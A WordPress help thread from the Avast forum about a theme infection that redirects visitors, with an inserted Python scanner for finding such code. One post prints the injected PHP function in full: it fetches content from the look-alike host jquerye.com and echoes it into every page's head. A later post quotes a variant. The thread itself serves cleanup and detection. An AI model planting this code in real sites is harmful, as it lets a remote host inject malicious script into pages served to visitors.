Avast WEBforum

Other => Viruses and worms => Topic started by: geryeo on August 23, 2012, 11:42:10 PM

Title: [Solved]
Post by: geryeo on August 23, 2012, 11:42:10 PM
Hello,
I just started a new website a few weeks ago, using WordPress + goodnews 3.4 theme. But yesterday when I clicked on a post "something" redirected me to this strange website: downloadmusicfreenow.com.
I can't figure out what can be infected... Please help me fix this.


Thank you!
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: !Donovan on August 24, 2012, 12:24:01 AM
Hi geryeo,

Can you provide the specific post you were on? Use hXtp:// instead of http://.

~!Donovan
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: polonus on August 24, 2012, 01:03:08 AM
Hi geryeo,

Wait for !Donovan to sort this out, but consider these WOT web rep results: http://www.mywot.com/en/scorecard/downloadmusicfreenow.com?utm_source=addon&utm_content=popup-donuts. The site is given as a malvertiser, so that is likely what will be turned up...
For your site I get a WordPress alert Web application version:
WordPress version: WordPress
Wordpress Version 3.3 or 3.4 based on: htxp://danongonline.net/wp-includes/js/autosave.js
WordPress theme: htxp://danongonline.net/wp-content/themes/goodnews34/
Wordpress internal path: /home/ducvan/public_html/danongonline.net/wp-content/themes/goodnews34/index.php
There could be a code issue here:
s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 benign
[nothing detected] (script) s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1
     status: (referer=danongonline.net/)saved 23917 bytes 54d6e2713dbe666dfb1c9339d1550616c2204807
     info: [img] s.gravatar.com/js/
     info: [decodingLevel=0] found JavaScript
     suspicious:
For further website security issues, see: http://net.saferpage.de/danongonline

polonus
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: geryeo on August 24, 2012, 10:38:47 AM
@Donovan  Sorry, I don't remember that post...

But I found in the theme folder .../post.php this part of code which looks very strange: ... jquerye.com/jquery-1.6.3.min.js ...
Shouldn't there be jquery.com?

Is there any good malware scanner site where I can upload the theme (I think the problem is there) and check it?

Thanks
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: polonus on August 24, 2012, 01:38:55 PM
Yes geryeo, that is malcode. !Donovan reported a similar case in another thread... jqueries was used there (plural), apparently they are variations on the same injected malcode theme.

polonus
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: geryeo on August 24, 2012, 01:46:44 PM
OK, so now I just need to delete that part with ...jquerye.com/jquery-1.6.3.min.js... to solve it?

Thanks polonus
Title: Re: [Wordpress] Malware redirect to another site. Help pls!
Post by: polonus on August 24, 2012, 01:57:11 PM
Hi geryeo,

You are welcome. Here is what the Sucuri Blog had on this: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html
blog article author = dre armeda

polonus
Title: Re: [Solved]
Post by: RamyNasr on October 11, 2012, 04:24:04 AM
Just to leave this as a reference for all who have a similar problem:

The code that I had in my WordPress website was inside the theme folder in a file called functions.init.php and it looked like this:

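Code:
// Injected code: registers a wp_head callback only if it is not already defined.
if (!function_exists('insert_jquery_slider')) {
    function insert_jquery_slider ()
    {
        if (function_exists('curl_init')) {
            // Look-alike host ("jquerye", not "jquery").
            $url = "http://www.jquerye.com/jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            // Whatever the remote server returned is written into the page's <head>.
            echo $data;
        }
    }
    // Run the callback on every page that calls wp_head().
    add_action('wp_head', 'insert_jquery_slider');
}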

If you ever happen to be in the same place, this is how to solve this:

Just search in all your files by text and look for “jquerye” or even better for “insert_jquery_slider” or any of the patterns you see in the piece of code above. That should point you where you need! (hint: just remove the whole function)
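
The text search described in the post above, as an added example that is not part of the original thread: a Python scanner that goes a step beyond searching for one string by flagging any look-alike jQuery host and any `wp_head` callback that downloads content with cURL and echoes it. The official-host list, the finding labels and the sample file are assumptions constructed for this example.

```python
import re
from pathlib import Path

# Hosts treated as genuine jQuery sources (assumption; extend for your own CDN).
OFFICIAL_JQUERY_HOSTS = {"jquery.com", "www.jquery.com", "code.jquery.com"}

HOOK_RE = re.compile(r"add_action\s*\(\s*['\"]wp_head['\"]\s*,\s*['\"](\w+)['\"]")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def scan_php_source(source):
    """Return a list of findings (strings) for one PHP file's text."""
    findings = []
    for host in sorted(set(h.lower() for h in URL_RE.findall(source))):
        if "jquery" in host and host not in OFFICIAL_JQUERY_HOSTS:
            findings.append(f"lookalike-jquery-host:{host}")
    for callback in HOOK_RE.findall(source):
        # Does the hooked callback download something and print it into the page?
        start = re.search(r"function\s+" + re.escape(callback) + r"\s*\(", source)
        hook = re.search(r"add_action\s*\([^)]*" + re.escape(callback), source)
        if start and hook and start.start() < hook.start():
            body = source[start.start():hook.start()]
            if "curl_exec" in body and re.search(r"\becho\b", body):
                findings.append(f"remote-fetch-echoed-in-wp_head:{callback}")
    return findings


def scan_tree(root):
    """Scan every .php file under root; return {relative path: findings}."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report


# Constructed sample mirroring the injected function posted above.
SAMPLE_INFECTED = """<?php
if (!function_exists('insert_jquery_slider')) {
    function insert_jquery_slider() {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://www.jquerye.com/jquery-1.6.3.min.js");
        $data = curl_exec($ch);
        echo $data;
    }
    add_action('wp_head', 'insert_jquery_slider');
}
"""
```

Run `scan_tree()` on a local copy of `wp-content/themes/`; the second check looks at what the callback does rather than at the domain, so it still fires if the URL has been changed.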
Title: Re: [Solved]
Post by: polonus on October 11, 2012, 10:31:32 AM
Hi RamyNasr,

We thank you very much for the solutions you found. Glad we could help to arrive there. Stay safe and secure,

polonus
Title: Re: [Solved]
Post by: icejay2000 on April 29, 2013, 12:12:40 AM
Hi, I don't know if I'm a little late to post in here regarding this issue. I am having the same problem. I am trying to edit 

 <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquery.com";$ch = curl_init();   $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

I just don't know what part to take out exactly. One person said to remove the function; I just need to know exactly what part of the code is the function, as I am totally new to this stuff... I have tried taking certain parts of it out, and I just mess things up. Any help will be greatly appreciated! Thank you in advance.
Title: Re: [Solved]
Post by: !Donovan on April 29, 2013, 12:47:48 AM
Everything that you posted is part of the function. Did you try removing the whole line?

Also: The code you provided says jquery.com, not jquerye.com. Is there any specific reason why you want to remove this?

~!Donovan